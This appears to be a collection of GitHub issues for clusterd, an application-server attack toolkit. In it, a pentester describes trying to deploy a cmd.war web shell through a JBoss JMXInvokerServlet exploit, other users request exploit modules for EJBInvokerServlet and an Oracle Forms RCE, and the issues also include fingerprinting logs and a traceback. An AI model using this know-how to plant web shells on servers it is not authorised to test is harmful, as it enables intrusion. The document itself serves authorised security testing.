I'm doing an internal pentest at the moment, and I've found a JBoss 5.1.0 GA which in theory is vulnerable to the invoker/JMXInvokerServlet and invoker/EJBInvokerServlet vulnerability. At first I tried to exploit it using the metasploit module, and then a similar PHP exploit I found on EDB, but both were failing for some reason. As I'm already domain admin, I could log to the box and see the logs, it turns out it was complaining about the remote .war file I was trying to upload and deploy, as it was hosted on my own web server. After doing some research I found this article: http://breenmachine.blogspot.co.uk/2014/02/jboss-jbxinvoker-servlet-update.html which comes to say that JBoss >= has a bug/feature that stops remote objects from being deployed. I read his post, compiled the Java exploit and ran it. It did upload my .war file to the folder /management (...management/cmd.war), but for some reason it seems as if it doesn't deploy it!!.
After that, I found this project, gave it a go, and the result is the same, your tool does upload the .war file, but it is never deployed for some reason I can't understand!.
Any ideas?
Can a module be added to implement this invoker for jboss http://www.exploit-db.com/exploits/28713/? Some sys admins restrict /invoker/JMXInvokerServlet/ but not /invoker/EJBInvokerServlet/ so it would be good to have a module to exploit that.
rewrite clusterd in powershell
Would be cool to see Clusterd print applicable auxiliary modules after fingerprinting a server, based upon said server's version. That is, something like:
[2014-07-23 02:49PM] Started at 2014-07-23 02:49PM
[2014-07-23 02:49PM] Servers' OS hinted at windows
[2014-07-23 02:49PM] Fingerprinting host '[ip]'
[2014-07-23 02:49PM] Server hinted at 'tomcat'
[2014-07-23 02:49PM] Checking tomcat version 3.3 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 3.3 Tomcat Admin...
[2014-07-23 02:49PM] Checking tomcat version 4.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 4.1 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 4.1 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 4.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 5.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 5.5 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 5.5 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 5.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 6.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 6.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 7.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 7.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 8.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 8.0 Tomcat Manager...
[2014-07-23 02:49PM] Matched 1 fingerprints for service tomcat
[2014-07-23 02:49PM] Tomcat (version 5.0)
[2014-07-23 02:49PM] Available Modules:
[2014-07-23 02:49PM] X...
[2014-07-23 02:49PM] Y...
[2014-07-23 02:49PM] Z...
[2014-07-23 02:49PM] Fingerprinting completed.
[2014-07-23 02:49PM] Finished at 2014-07-23 02:49PM
A pretty severe RCE vulnerability was disclosed in Oracle's Forms 10g server that looks like it would be trivial to implement in clusterd (https://www.netspi.com/blog/entryid/243/advisory-oracle-forms-10g-unauthenticated-remote-code-execution-cve-2014-4278). Also I would think this would be a good time to take a look at what other modules related to Oracle application servers that could be implemented in clusterd (SMB hash aux modules, other exploits, etc).
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-16 11:40AM] Started at 2014-05-16 11:40AM
[2014-05-16 11:40AM] Servers' OS hinted at windows
[2014-05-16 11:40AM] Fingerprinting host 'x'
[2014-05-16 11:40AM] Checking jboss version 3.2 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 3.2 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 3.0 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 4.0 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 4.0 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 5.1 JBoss Web Manager...
[2014-05-16 11:40AM] Checking jboss version 5.1 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 5.1 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-16 11:40AM] Checking jboss version 6.0 JBoss Web Manager...
[2014-05-16 11:40AM] Checking jboss version 6.1 JBoss Web Manager...
[2014-05-16 11:40AM] Checking jboss version 6.1 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 6.0 JBoss JMX Console...
[2014-05-16 11:40AM] Checking jboss version 7.1 JBoss Management...
[2014-05-16 11:40AM] Checking jboss version 7.0 JBoss Management...
[2014-05-16 11:40AM] Checking jboss version 8.0 JBoss Management...
[2014-05-16 11:40AM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-16 11:40AM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
Traceback (most recent call last):
File "./clusterd.py", line 119, in <module>
run(options)
File "./clusterd.py", line 92, in run
fingerengine.run()
File "/root/git/clusterd/src/core/fingerprint.py", line 97, in run
matched_fps = self.check_service(service)
File "/root/git/clusterd/src/core/fingerprint.py", line 59, in check_service
matched_fingerprints = self.definitions(self.options.ip, self.options.port, service)
File "/root/git/clusterd/src/core/fingerprint.py", line 32, in definitions
fp = fp.FPrint()
File "/root/git/clusterd/src/platform/jboss/fingerprints/JBossInvoker.py", line 13, in __init__
AttributeError: class JINTERFACES has no attribute 'IN'
Title. Serialize bugs should be added as modules.
Right now it doesn't seem possible to pass a vhost parameter. It would be handy to do that where I have an IP but it requires the host variable to talk with the application.